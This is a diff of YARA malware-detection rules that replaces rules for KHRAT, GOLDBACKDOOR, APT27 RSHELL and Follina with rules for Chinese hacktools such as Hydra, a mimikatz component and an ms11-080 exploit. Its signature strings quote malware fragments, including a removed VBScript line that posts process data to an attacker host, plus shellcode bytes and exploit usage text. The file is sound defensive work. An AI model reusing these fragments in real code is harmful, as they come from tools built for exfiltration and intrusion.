+		$s3 = "@ddns.oray.com/ph/update?hostname=" fullword ascii
+		$s4 = "No data to read.$Can not bind in port range (%d - %d)" fullword wide
+		$s5 = "ListViewProcessListColumnClick!" fullword ascii
+		$s6 = "http://iframe.ip138.com/ic.asp" fullword ascii
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and 3 of them
 }
-rule SIGNATURE_BASE_MAL_KHRAT_Scritplet : FILE
+rule SIGNATURE_BASE_Ms11080_Withcmd : FILE
 {
 	meta:
-		description = "Rule derived from KHRAT scriptlet"
+		description = "Chinese Hacktool Set - file ms11080_withcmd.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f72d68a3-0409-5401-b6a1-ca8f188d7409"
-		date = "2017-08-31"
-		modified = "2023-12-05"
-		reference = "https://researchcenter.paloaltonetworks.com/2017/08/unit42-updated-khrat-malware-used-in-cambodia-attacks/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_khrat.yar#L43-L62"
+		id = "fa5002ac-d6e6-543f-8020-43dfae689b3b"
+		date = "2015-06-13"
+		modified = "2022-12-21"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L2069-L2087"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "cbbabd8e2f17827d96aeef4ea362f133cf3fcc31716c517b86a05a010ff62510"
+		hash = "745e5058acff27b09cfd6169caf6e45097881a49"
+		logic_hash = "cd7167269538a5dd197260682ad777f87e43cc2155acf3ce731d1a065395cf4a"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "cdb9104636a6f7c6018fe99bc18fb8b542689a84c23c10e9ea13d5aa275fd40e"
 
 	strings:
-		$x1 = "http.open \"POST\", \"http://update.upload-dropbox[.]com/docs/tz/GetProcess.php\",False,\"\",\"\" " fullword ascii
-		$x2 = "Process=Process & Chr(32) & Chr(32) & Chr(32) & Obj.Description" fullword ascii
-		$s1 = "http.SetRequestHeader \"Content-Type\", \"application/json\" " fullword ascii
-		$s2 = "Dim http,WMI,Objs,Process" fullword ascii
-		$s3 = "Set Objs=WMI.InstancesOf(\"Win32_Process\")" fullword ascii
-		$s4 = "'WScript.Echo http.responseText " fullword ascii
+		$s1 = "Usage : ms11-080.exe cmd.exe Command " fullword ascii
+		$s2 = "\\ms11080\\ms11080\\Debug\\ms11080.pdb" ascii
+		$s3 = "[>] by:Mer4en7y@90sec.org" fullword ascii
+		$s4 = "[>] create porcess error" fullword ascii
+		$s5 = "[>] ms11-080 Exploit" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x3f3c and filesize < 1KB and ( 1 of ( $x* ) or 4 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and 1 of them
 }
-
-rule SIGNATURE_BASE_MAL_Floxif_Generic : FILE
+rule SIGNATURE_BASE_Othertools_Xiaoa : FILE
 {
 	meta:
-		description = "Detects Floxif Malware"
+		description = "Chinese Hacktool Set - file xiaoa.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5ddd6a6c-b02a-518b-bbe3-8f528b3d7eae"
-		date = "2018-05-11"
+		id = "a456d373-2063-5264-8cf4-d0a5918392fc"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_floxif_flystudio.yar#L3-L18"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L2089-L2107"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1996f717100d9f1abc2ed3f1e9d0c55daec09654c0f99987ddaea9e9f0d17008"
-		score = 80
+		hash = "6988acb738e78d582e3614f83993628cf92ae26d"
+		logic_hash = "451ed602bd1e9dd7e4020108ea133b60c546965bd77be349d07be42150f80fee"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "de055a89de246e629a8694bde18af2b1605e4b9b493c7e4aef669dd67acf5085"
+
+	strings:
+		$s1 = "Usage:system_exp.exe \"cmd\"" fullword ascii
+		$s2 = "The shell \"cmd\" success!" fullword ascii
+		$s3 = "Not Windows NT family OS." fullword ascii
+		$s4 = "Unable to get kernel base address." fullword ascii
+		$s5 = "run \"%s\" failed,code: %d" fullword ascii
+		$s6 = "Windows Kernel Local Privilege Exploit " fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( pe.imphash ( ) == "2f4ddcfebbcad3bacadc879747151f6f" or pe.exports ( "FloodFix" ) or pe.exports ( "FloodFix2" ) )
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and 2 of them
 }
-
-rule SIGNATURE_BASE_MAL_CN_Flystudio_May18_1 : FILE
+rule SIGNATURE_BASE_Unknown2 : FILE
 {
 	meta:
-		description = "Detects malware / hacktool detected in May 2018"
+		description = "Chinese Hacktool Set - file unknown2.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b78b9ea0-5eef-5922-b5d7-d3c5ddce7fad"
-		date = "2018-05-11"
+		id = "af7ddcbf-1cba-51a9-b435-9a267320f502"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_floxif_flystudio.yar#L21-L38"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L2109-L2128"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8d03f02a270d8664175b65398c01ec4f0ea182437b31847f9bf4181edb0c36bb"
+		hash = "32508d75c3d95e045ddc82cb829281a288bd5aa3"
+		logic_hash = "dea499eaa87cc454a31672fb842539779926d50785ef827162fde84bfcdcc54a"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "b85147366890598518d4f277d44506eef871fd7fc6050d8f8e68889cae066d9e"
 
 	strings:
-		$s1 = "WTNE / MADE BY E COMPILER - WUTAO " fullword ascii
-		$s2 = "www.cfyhack.cn" fullword ascii
+		$s1 = "http://md5.com.cn/index.php/md5reverse/index/md/" wide
+		$s2 = "http://www.md5decrypter.co.uk/feed/api.aspx?" wide
+		$s3 = "http://www.md5.com.cn" fullword wide
+		$s4 = "1.5.exe" fullword wide
+		$s5 = "\\Set.ini" wide
+		$s6 = "OpenFileDialog1" fullword wide
+		$s7 = " (*.txt)|*.txt" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 5000KB and ( pe.imphash ( ) == "65ae5cf17140aeaf91e3e9911da0ee3e" or 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and 4 of them
 }
-rule SIGNATURE_BASE_ONHAT_Proxy_Hacktool : FILE
+rule SIGNATURE_BASE_Hydra_7_3_Hydra : FILE
 {
 	meta:
-		description = "Detects ONHAT Proxy - Htran like SOCKS hack tool used by Chinese APT groups"
+		description = "Chinese Hacktool Set - file hydra.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "cb18a5b0-dbbd-5dd3-af66-21b8302df6de"
-		date = "2016-05-12"
+		id = "70e9a5bf-ce2d-58ab-8bdc-257e2aa5e917"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/p32Ozf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_onhat_proxy.yar#L8-L31"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L2130-L2147"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d8c088ecdedbd74ca174244c407c3bb27ccd082ec515c62ee19c93e0d45d3f3b"
-		score = 100
+		hash = "2f82b8bf1159e43427880d70bcd116dc9e8026ad"
+		logic_hash = "23194c2df0b8bdedc4fc66c423b0aebb10217de328a194b26560d4cc9a5531e3"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "30b2de0a802a65b4db3a14593126301e6949c1249e68056158b2cc74798bac97"
-		hash2 = "94bda24559713c7b8be91368c5016fc7679121fea5d565d3d11b2bb5d5529340"
-		hash3 = "a26e75fec3b9f7d5a1c3d0ce1e89e4b0befb7a601da0c69a4cf96301921771dd"
-		hash4 = "c202e9d5b99f6137c7c07305c7314e55f52bae832d460c44efc8f2a90ff03615"
-		hash5 = "dded62ad85c0bdd68bcc96f88d8ba42d5ad0ef999911ebdea3f561a4491ebbc6"
-		hash6 = "f0954774c91603fc2595f0ba0727b9af4e80f6f9be7bb629e7fb6ba4309ed4ea"
-		hash7 = "f3906be01d51e2e1ae9b03cd09702b6e0794b9c9fd7dc04024f897e96bb13232"
-		hash8 = "f65ae9ccf988a06a152f27a4c0d7992100a2d9d23d80efe8d8c2a5c9bd78a3a7"
 
 	strings:
-		$s1 = "INVALID PARAMETERS. TYPE ONHAT.EXE -h FOR HELP INFORMATION." fullword ascii
-		$s2 = "[ONHAT] LISTENS (S, %d.%d.%d.%d, %d) ERROR." fullword ascii
-		$s3 = "[ONHAT] CONNECTS (T, %d.%d.%d.%d, %d.%d.%d.%d, %d) ERROR." fullword ascii
+		$s1 = "[ATTEMPT-ERROR] target %s - login \"%s\" - pass \"%s\" - child %d - %lu of %lu" fullword ascii
+		$s2 = "(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=))(COMMAND=reload)(PASSWORD=%s)(SERVICE" ascii
+		$s3 = "cn=^USER^,cn=users,dc=foo,dc=bar,dc=com for domain foo.bar.com" fullword ascii
+		$s4 = "[%d][smb] Host: %s Account: %s Error: ACCOUNT_CHANGE_PASSWORD" fullword ascii
+		$s5 = "hydra -P pass.txt target cisco-enable  (direct console access)" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 80KB and ( 1 of ( $s* ) ) ) or ( 2 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 700KB and 1 of them
 }
-rule SIGNATURE_BASE_EXT_NK_GOLDBACKDOOR_Inital_Shellcode
+rule SIGNATURE_BASE_Oraclescan : FILE
 {
 	meta:
-		description = "Detection for initial shellcode loader used to deploy GOLDBACDOOR"
-		author = "Silas Cutler (silas@Stairwell.com)"
-		id = "daab8e54-11b3-51cc-8bee-55b078f3e791"
-		date = "2022-04-21"
+		description = "Chinese Hacktool Set - file OracleScan.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "142c0ed1-0752-54c3-9a4b-68e656c32939"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "https://stairwell.com/wp-content/uploads/2022/04/Stairwell-threat-report-The-ink-stained-trail-of-GOLDBACKDOOR.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_goldbackdoor.yar#L2-L20"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L2149-L2165"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4df97181037a580098dbe34d3b6ceab5c7b83932f1831c36ee99876a8f1524f9"
-		score = 80
+		hash = "10ff7faf72fe6da8f05526367b3522a2408999ec"
+		logic_hash = "b9454f47123c32d6c6b51722aeadac9acc2a6232c259703c36ea00c83d8977e6"
+		score = 75
 		quality = 85
-		tags = ""
-		version = "0.1"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$ = { C7 45 C4 25 6C 6F 63 50 8D 45 C4 C7 45 C8 61 6C 61 70 8B F9 C7 45
-              CC 70 64 61 74 50 B9 BD 88 17 75 C7 45 D0 61 25 5C 6C 8B DA C7 45 D4 6F
-              67 5F 67 C7 45 D8 6F 6C 64 2E C7 45 DC 74 78 74 00 }
-		$ = { 51 50 57 56 B9 E6 8E 85 35 E8 ?? ?? ?? ?? FF D0 }
-		$ = { 6A 40 68 00 10 00 00 52 6A 00 FF 75 E0 B9 E3 18 90 72 E8 ?? ?? ?? ?? FF D0}
+		$s1 = "MYBLOG:HTTP://HI.BAIDU.COM/0X24Q" fullword ascii
+		$s2 = "\\Borland\\Delphi\\RTL" ascii
+		$s3 = "USER_NAME" ascii
+		$s4 = "FROMWWHERE" fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
 }
-rule SIGNATURE_BASE_EXT_NK_GOLDBACKDOOR_Injected_Shellcode
+rule SIGNATURE_BASE_Sqltools : FILE
 {
 	meta:
-		description = "Detection for injected shellcode that decodes GOLDBACKDOOR"
-		author = "Silas Cutler (silas@Stairwell.com)"
-		id = "aa921f01-98cc-51ab-877a-e7beede77e36"
-		date = "2022-04-21"
+		description = "Chinese Hacktool Set - file SQLTools.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "bddb7956-abc1-58b6-8a6d-eb482be99f42"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "https://stairwell.com/wp-content/uploads/2022/04/Stairwell-threat-report-The-ink-stained-trail-of-GOLDBACKDOOR.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_goldbackdoor.yar#L22-L42"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L2167-L2186"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b45f408c0f342591e66ef0dfcfc1c09f8558c5e8f4bd7f824b30f00d531c7511"
-		score = 80
+		hash = "38a9caa2079afa2c8d7327e7762f7ed9a69056f7"
+		logic_hash = "35b84c3445e92d61ca5e638a2eb19128dca2174327c6325436287d8d3f0bb976"
+		score = 75
 		quality = 85
-		tags = ""
-		version = "0.1"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
-	strings:
-		$dec_routine = { 8A 19 57 8B FA 8B 51 01 83 C1 05 85 D2 74 0E 56 8B C1 8B F2 30 18 40 83 EE 01 75 F8 5E 57 }
-		$rtlfillmemory_load = { B9 4B 17 CD 5B 55 56 33 ED 55 6A 10 50 E8 86 00 00 00 FF D0 }
-		$ = "StartModule"
-		$log_file_name = { C7 44 24 3C 25 6C 6F 63 50 8D 44 24 40 C7 44 24 44 61 6C
-                           61 70 50 B9 BD 88 17 75 C7 44 24 4C 70 64 61 74 C7 44 24
-                           50 61 25 5C 6C C7 44 24 54 6F 67 5F 67 C7 44 24 58 6F 6C
-                           64 32 C7 44 24 5C 2E 74 78 74 }
-		$ = { B9 8E 8A DD 8D 8B F0 E8 E9 FB FF FF FF D0 }
+	strings:
+		$s1 = "DBN_POST" fullword wide
+		$s2 = "LOADER ERROR" fullword ascii
+		$s3 = "www.1285.net" fullword wide
+		$s4 = "TUPFILEFORM" fullword wide
+		$s5 = "DBN_DELETE" fullword wide
+		$s6 = "DBINSERT" fullword wide
+		$s7 = "Copyright (C) Kibosoft Corp. 2001-2006" fullword wide
 
 	condition:
-		3 of them
+		uint16( 0 ) == 0x5a4d and filesize < 2350KB and all of them
 }
-rule SIGNATURE_BASE_EXT_NK_GOLDBACKDOOR_Generic_Shellcode
+rule SIGNATURE_BASE_HKTL_Portscanner_533_NET_Jun15 : FILE
 {
 	meta:
-		description = "Generic detection for shellcode used to drop GOLDBACKDOOR"
-		author = "Silas Cutler (silas@Stairwell.com)"
-		id = "70081d63-0b26-5358-8444-5adc3a44aaa0"
-		date = "2022-04-21"
+		description = "Chinese Hacktool Set - file portscanner.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "c834203d-6d4d-5242-9b1e-b64fa6560ccd"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "https://stairwell.com/wp-content/uploads/2022/04/Stairwell-threat-report-The-ink-stained-trail-of-GOLDBACKDOOR.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_goldbackdoor.yar#L44-L58"
+		old_rule_name = "portscanner"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L2188-L2205"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e046a70b1dee020ba73d960a9d91daaccd0b5c262965c8647f608c5c83a28257"
+		hash = "1de367d503fdaaeee30e8ad7c100dd1e320858a4"
+		logic_hash = "446cbc1b8046bfd182e0b1c98fe37c8b8ef98f600f5d80d9de83b45aeaf2b386"
 		score = 75
 		quality = 85
-		tags = ""
-		version = "0.1"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$ = { B9 8E 8A DD 8D 8B F0 E8 ?? ?? ?? ?? FF D0 }
-		$ = { B9 8E AB 6F 40 [1-10] 50 [1-10] E8 ?? ?? ?? ?? FF D0 }
+		$s0 = "PortListfNo" fullword ascii
+		$s1 = ".533.net" fullword ascii
+		$s2 = "CRTDLL.DLL" fullword ascii
+		$s3 = "exitfc" fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 25KB and all of them
 }
-rule SIGNATURE_BASE_APT_MAL_APT27_Rshell_Jul24 : MALWARE RSHELL___SYSUPDATE FILE
+rule SIGNATURE_BASE_Kappfree : FILE
 {
 	meta:
-		description = "YARA rule to detect RSHELL of APT27"
-		author = "Bundesamt fuer Verfassungsschutz, modified by Florian Roth"
-		id = "67c8ac4e-8e2f-5cca-90cb-5d5fdf6f86b5"
-		date = "2024-07-11"
-		modified = "2024-12-12"
-		reference = "https://x.com/bfv_bund/status/1811364839656185985?s=12&t=C0_T_re0wRP_NfKa27Xw9w"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt27_rshell.yar#L2-L41"
+		description = "Chinese Hacktool Set - file kappfree.dll"
+		author = "Florian Roth (Nextron Systems)"
+		id = "eb9c1324-5d82-57ab-bd48-98c984b45b32"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L2207-L2222"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "be5f6281d722bd07e53acd459c794fe3ae870a05ed8979de4c28d357110617bd"
+		hash = "e57e79f190f8a24ca911e6c7e008743480c08553"
+		logic_hash = "b1b644f9b033ac8372369e81628ee3f6fe094f80d11b8f4f6c192a5e81d2e543"
 		score = 75
 		quality = 85
-		tags = "MALWARE, RSHELL / SYSUPDATE, FILE"
-		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		malware = "RSHELL / SYSUPDATE"
-		hash1 = "0433edfad648e1e29be54101abaded690302dc7e49ad916cfbbddf99b3ade12c"
-		hash2 = "10bb89fdf25c88d3c5623e8d68573124c9a42549750014e3675e2ca342aeba4a"
-		hash3 = "2603e1f61363451891c97b0c4ce8acfbfb680d3df4282f9d151ecce3a5679616"
-		hash4 = "70dac42491f8f19568a5d7b1d10b29f732a88d75e7f2bfa07b23202bacadf56f"
-		hash5 = "b988a6583ce40f07e5fc8e890ae2b1c84a93db8a2e3ca8769241b94bea332a7a"
-		hash6 = "c4fe1e56f601d411e2385352606524fb8bbf773bc2ba14889a8de605c2d14da0"
-		hash7 = "c787144d285fcca8a542f7a5525a37bcd089b39068b9a4db7fe3554ee6c08301"
-		hash8 = "ddaa4d23e4651a517fffbd29f0924607ba6b6253171144da5e49237afe91666b"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a1 = "%02x%02x%02x%02x-%02x%02x-%02x%02x-%02x%02x-%02x%02x%02x%02x%02x%" ascii
-		$a2 = "/proc/self/exe" ascii
-		$s1 = "HISTFILE" ascii fullword
-		$s2 = "/tmp/guid" ascii fullword
-		$sop1 = { e8 ?? ?? ?? ?? c7 43 04 00 00 00 00 8b 3b 85 ff 7e 2? e8 ?? ?? 0? 00 85 c0 7e 0? }
-		$sop2 = { c7 43 04 00 00 00 00 8b 3b 85 ff 7e 2? e8 ?? ?? 0? 00 85 c0 7e 0? f7 d8 }
+		$s1 = "Bienvenue dans un processus distant" fullword wide
+		$s2 = "kappfree.dll" fullword ascii
+		$s3 = "kappfree de mimikatz pour Windows (anti AppLocker)" fullword wide
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or ( uint32be( 0 ) == 0xcafebabe and uint32be( 4 ) < 0x20 ) or uint32( 0 ) == 0xfeedface or uint32( 0 ) == 0xfeedfacf ) and filesize < 2MB and all of ( $a* ) and 2 of ( $s* ) or 3 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
 }
-rule SIGNATURE_BASE_SUSP_PS1_Msdt_Execution_May22 : CVE_2022_30190 FILE
+rule SIGNATURE_BASE_Smartniff : FILE
 {
 	meta:
-		description = "Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation"
-		author = "Nasreddine Bencherchali, Christian Burkard"
-		id = "d48d9ac9-7d3e-51c9-b017-22829ae5ecfd"
-		date = "2022-05-31"
-		modified = "2025-03-21"
-		reference = "https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_doc_follina.yar#L2-L36"
+		description = "Chinese Hacktool Set - file Smartniff.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "3d169126-1b43-5545-a106-7c38a6a49499"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L2224-L2239"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9b8a061de4210d23e58b5190a300ee331273fc98f357156a0bb1d79f9f2b49b1"
-		score = 65
+		hash = "67609f21d54a57955d8fe6d48bc471f328748d0a"
+		logic_hash = "bac770ae3c8e7f619da0b0ff4243716ff8212dce0f36c08c127af892548fe0b6"
+		score = 75
 		quality = 85
-		tags = "CVE-2022-30190, FILE"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a = "PCWDiagnostic" ascii wide fullword
-		$sa1 = "msdt.exe" ascii wide
-		$sa2 = "msdt " ascii wide
-		$sa3 = "ms-msdt" ascii wide
-		$sb1 = "/af " ascii wide
-		$sb2 = "-af " ascii wide
-		$sb3 = "IT_BrowseForFile=" ascii wide
-		$fp1 = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00
-               46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00
-               00 00 70 00 63 00 77 00 72 00 75 00 6E 00 2E 00
-               65 00 78 00 65 00 }
-		$fp2 = "FilesFullTrust" wide
-		$fp3 = "Cisco Spark" ascii wide
-		$fp4 = "author: " ascii
+		$s1 = "smsniff.exe" fullword wide
+		$s2 = "support@nirsoft.net0" fullword ascii
+		$s3 = "</requestedPrivileges></security></trustInfo></assembly>" fullword ascii
 
 	condition:
-		filesize < 10MB and $a and 1 of ( $sa* ) and 1 of ( $sb* ) and not 1 of ( $fp* ) and not uint8( 0 ) == 0x7B
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
 }
-rule SIGNATURE_BASE_SUSP_Doc_Wordxmlrels_May22 : CVE_2022_30190 FILE
+rule SIGNATURE_BASE_Chinachopper_Caidao : FILE
 {
 	meta:
-		description = "Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitation"
-		author = "Tobias Michalski, Christian Burkard, Wojciech Cieslak"
-		id = "304c4816-b2f6-5319-9fe9-8f74bdb82ad0"
-		date = "2022-05-30"
-		modified = "2022-06-20"
-		reference = "https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_doc_follina.yar#L38-L60"
+		description = "Chinese Hacktool Set - file caidao.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "c56eb3e5-e916-535b-bf87-88a9ae94c359"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L2241-L2259"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "62f262d180a5a48f89be19369a8425bec596bc6a02ed23100424930791ae3df0"
-		logic_hash = "c9846f8c2c1724792de14ab4de0064f951a8faaf01cc27d873e600f29d59c842"
-		score = 70
+		hash = "056a60ec1f6a8959bfc43254d97527b003ae5edb"
+		logic_hash = "7e16a452c98e36a4946bcede5552bef7f6fc82314b28b506307cf010a0890ea6"
+		score = 75
 		quality = 85
-		tags = "CVE-2022-30190, FILE"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a1 = "<Relationships" ascii
-		$a2 = "TargetMode=\"External\"" ascii
-		$x1 = ".html!" ascii
-		$x2 = ".htm!" ascii
-		$x3 = "%2E%68%74%6D%6C%21" ascii
-		$x4 = "%2E%68%74%6D%21" ascii
+		$s1 = "Pass,Config,n{)" fullword ascii
+		$s2 = "phMYSQLZ" fullword ascii
+		$s3 = "\\DHLP\\." ascii
+		$s4 = "\\dhlp\\." ascii
+		$s5 = "SHAutoComple" fullword ascii
+		$s6 = "MainFrame" ascii
 
 	condition:
-		filesize < 50KB and all of ( $a* ) and 1 of ( $x* )
+		uint16( 0 ) == 0x5a4d and filesize < 1077KB and all of them
 }
-rule SIGNATURE_BASE_SUSP_Doc_RTF_Externalresource_May22 : CVE_2022_30190 FILE
+rule SIGNATURE_BASE_Kiwitaskmgr_2 : FILE
 {
 	meta:
-		description = "Detects a suspicious pattern in RTF files which downloads external resources as seen in CVE-2022-30190 / Follina exploitation"
-		author = "Tobias Michalski, Christian Burkard"
-		id = "71bb97e0-ec12-504c-a1f6-25039ac91c86"
-		date = "2022-05-30"
-		modified = "2022-05-31"
-		reference = "https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_doc_follina.yar#L62-L78"
+		description = "Chinese Hacktool Set - file KiwiTaskmgr.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "ea021257-8ced-5131-a00a-be014b4112fb"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L2261-L2276"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c841e0c1ff78bf8dade5f573a7452b16a7f447cfc19417704b727684a8f3d3ff"
-		score = 70
+		hash = "8bd6c9f2e8be3e74bd83c6a2d929f8a69422fb16"
+		logic_hash = "6d197e9b7bb9bbd759d6c8c882f7d7412512ba10208cb52a08fcde5e32fd1733"
+		score = 75
 		quality = 85
-		tags = "CVE-2022-30190, FILE"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = " LINK htmlfile \"http" ascii
-		$s2 = ".html!\" " ascii
+		$s1 = "Process Ok, Memory Ok, resuming process :)" fullword wide
+		$s2 = "Kiwi Taskmgr no-gpo" fullword wide
+		$s3 = "KiwiAndTaskMgr" fullword wide
 
 	condition:
-		uint32be( 0 ) == 0x7B5C7274 and filesize < 300KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
 }
